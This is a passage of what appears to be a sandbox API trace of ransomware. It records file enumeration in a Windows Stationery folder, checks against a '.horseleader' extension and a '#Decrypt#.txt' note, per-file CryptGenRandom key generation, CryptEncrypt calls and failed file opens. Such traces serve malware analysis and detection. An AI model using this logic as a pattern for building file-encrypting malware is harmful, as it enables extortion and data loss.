pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.773] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0xffffffff [0245.774] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f31568, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f31568, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Pretty_Peacock.jpg", cAlternateFileName="")) returned 1 [0245.774] lstrcmpiW (lpString1="Pretty_Peacock.jpg", lpString2="Windows") returned -1 [0245.774] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned 80 [0245.774] StrStrIW (lpFirst="Pretty_Peacock.jpg", lpSrch=".horseleader") returned 0x0 [0245.774] lstrcmpW (lpString1="Pretty_Peacock.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.774] lstrcmpW (lpString1="Pretty_Peacock.jpg", lpString2="_uninstalling_.png") returned 1 [0245.774] lstrlenW (lpString=".testttjffg") returned 11 [0245.774] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg", lpSrch=".testttjffg") returned 0x0 [0245.774] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.774] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0245.775] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f7d822, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f7d822, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36e1, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Psychedelic.jpg", cAlternateFileName="")) returned 1 [0245.775] lstrcmpiW (lpString1="Psychedelic.jpg", lpString2="Windows") returned -1 [0245.775] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned 77 [0245.775] StrStrIW (lpFirst="Psychedelic.jpg", lpSrch=".horseleader") returned 0x0 [0245.775] lstrcmpW (lpString1="Psychedelic.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.775] lstrcmpW (lpString1="Psychedelic.jpg", lpString2="_uninstalling_.png") returned 1 [0245.775] lstrlenW (lpString=".testttjffg") returned 11 [0245.775] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg", lpSrch=".testttjffg") returned 0x0 [0245.775] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.775] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0245.779] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce12fdf6, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0245.779] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0245.779] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned 71 [0245.779] StrStrIW (lpFirst="Roses.htm", lpSrch=".horseleader") returned 0x0 [0245.779] lstrcmpW (lpString1="Roses.htm", lpString2="#Decrypt#.txt") returned 1 [0245.779] lstrcmpW (lpString1="Roses.htm", lpString2="_uninstalling_.png") returned 1 [0245.779] lstrlenW (lpString=".testttjffg") returned 11 [0245.779] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm", lpSrch=".testttjffg") returned 0x0 [0245.779] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.780] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.781] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa567585, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0245.781] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0245.781] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned 71 [0245.781] StrStrIW (lpFirst="Roses.jpg", lpSrch=".horseleader") returned 0x0 [0245.782] lstrcmpW (lpString1="Roses.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.782] lstrcmpW (lpString1="Roses.jpg", lpString2="_uninstalling_.png") returned 1 [0245.782] lstrlenW (lpString=".testttjffg") returned 11 [0245.782] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg", lpSrch=".testttjffg") returned 0x0 [0245.782] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.782] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.783] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc53cdfab, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc53cdfab, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45148cd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Sand_Paper.jpg", cAlternateFileName="")) returned 1 [0245.783] lstrcmpiW (lpString1="Sand_Paper.jpg", lpString2="Windows") returned -1 [0245.783] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 76 [0245.783] StrStrIW (lpFirst="Sand_Paper.jpg", lpSrch=".horseleader") returned 0x0 [0245.783] lstrcmpW (lpString1="Sand_Paper.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.783] lstrcmpW (lpString1="Sand_Paper.jpg", lpString2="_uninstalling_.png") returned 1 [0245.783] lstrlenW (lpString=".testttjffg") returned 11 [0245.784] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg", lpSrch=".testttjffg") returned 0x0 [0245.784] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.784] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.784] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5277366, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5277366, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4516ee37, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x91c4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Seyes.emf", cAlternateFileName="")) returned 1 [0245.784] lstrcmpiW (lpString1="Seyes.emf", lpString2="Windows") returned -1 [0245.784] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 71 [0245.784] StrStrIW (lpFirst="Seyes.emf", lpSrch=".horseleader") returned 0x0 [0245.784] lstrcmpW (lpString1="Seyes.emf", lpString2="#Decrypt#.txt") returned 1 [0245.784] lstrcmpW (lpString1="Seyes.emf", lpString2="_uninstalling_.png") returned 1 [0245.784] lstrlenW (lpString=".testttjffg") returned 11 [0245.784] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf", lpSrch=".testttjffg") returned 0x0 [0245.784] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.784] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.785] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce17c0b0, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0245.785] lstrcmpiW (lpString1="Shades of Blue.htm", lpString2="Windows") returned -1 [0245.785] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 80 [0245.785] StrStrIW (lpFirst="Shades of Blue.htm", lpSrch=".horseleader") returned 0x0 [0245.785] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="#Decrypt#.txt") returned 1 [0245.785] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="_uninstalling_.png") returned 1 [0245.785] lstrlenW (lpString=".testttjffg") returned 11 [0245.785] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm", lpSrch=".testttjffg") returned 0x0 [0245.785] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.785] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.786] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa58d6e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0245.786] lstrcmpiW (lpString1="ShadesOfBlue.jpg", lpString2="Windows") returned -1 [0245.786] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned 78 [0245.786] StrStrIW (lpFirst="ShadesOfBlue.jpg", lpSrch=".horseleader") returned 0x0 [0245.786] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.786] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="_uninstalling_.png") returned 1 [0245.786] lstrlenW (lpString=".testttjffg") returned 11 [0245.786] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg", lpSrch=".testttjffg") returned 0x0 [0245.786] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.786] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.788] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc530f8da, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc530f8da, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45194f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13d8c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Shorthand.emf", cAlternateFileName="")) returned 1 [0245.788] lstrcmpiW (lpString1="Shorthand.emf", lpString2="Windows") returned -1 [0245.788] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned 75 [0245.788] StrStrIW (lpFirst="Shorthand.emf", lpSrch=".horseleader") returned 0x0 [0245.788] lstrcmpW (lpString1="Shorthand.emf", lpString2="#Decrypt#.txt") returned 1 [0245.788] lstrcmpW (lpString1="Shorthand.emf", lpString2="_uninstalling_.png") returned 1 [0245.788] lstrlenW (lpString=".testttjffg") returned 11 [0245.788] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf", lpSrch=".testttjffg") returned 0x0 [0245.788] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.788] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.791] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc541a265, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc541a265, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x451bb0f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Small_News.jpg", cAlternateFileName="")) returned 1 [0245.791] lstrcmpiW (lpString1="Small_News.jpg", lpString2="Windows") returned -1 [0245.791] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned 76 [0245.791] StrStrIW (lpFirst="Small_News.jpg", lpSrch=".horseleader") returned 0x0 [0245.791] lstrcmpW (lpString1="Small_News.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.791] lstrcmpW (lpString1="Small_News.jpg", lpString2="_uninstalling_.png") returned 1 [0245.791] lstrlenW (lpString=".testttjffg") returned 11 [0245.791] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg", lpSrch=".testttjffg") returned 0x0 [0245.791] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.791] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.791] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1a220d, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0245.792] lstrcmpiW (lpString1="Soft Blue.htm", lpString2="Windows") returned -1 [0245.792] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned 75 [0245.792] StrStrIW (lpFirst="Soft Blue.htm", lpSrch=".horseleader") returned 0x0 [0245.792] lstrcmpW (lpString1="Soft Blue.htm", lpString2="#Decrypt#.txt") returned 1 [0245.792] lstrcmpW (lpString1="Soft Blue.htm", lpString2="_uninstalling_.png") returned 1 [0245.792] lstrlenW (lpString=".testttjffg") returned 11 [0245.792] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm", lpSrch=".testttjffg") returned 0x0 [0245.792] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.792] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.793] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5b3841, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0245.793] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0245.793] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg") returned 74 [0245.793] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".horseleader") returned 0x0 [0245.794] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.794] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="_uninstalling_.png") returned 1 [0245.794] lstrlenW (lpString=".testttjffg") returned 11 [0245.794] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg", lpSrch=".testttjffg") returned 0x0 [0245.794] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.794] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.795] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1c836a, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0245.795] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0245.795] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm") returned 71 [0245.795] StrStrIW (lpFirst="Stars.htm", lpSrch=".horseleader") returned 0x0 [0245.795] lstrcmpW (lpString1="Stars.htm", lpString2="#Decrypt#.txt") returned 1 [0245.795] lstrcmpW (lpString1="Stars.htm", lpString2="_uninstalling_.png") returned 1 [0245.795] lstrlenW (lpString=".testttjffg") returned 11 [0245.795] StrStrW 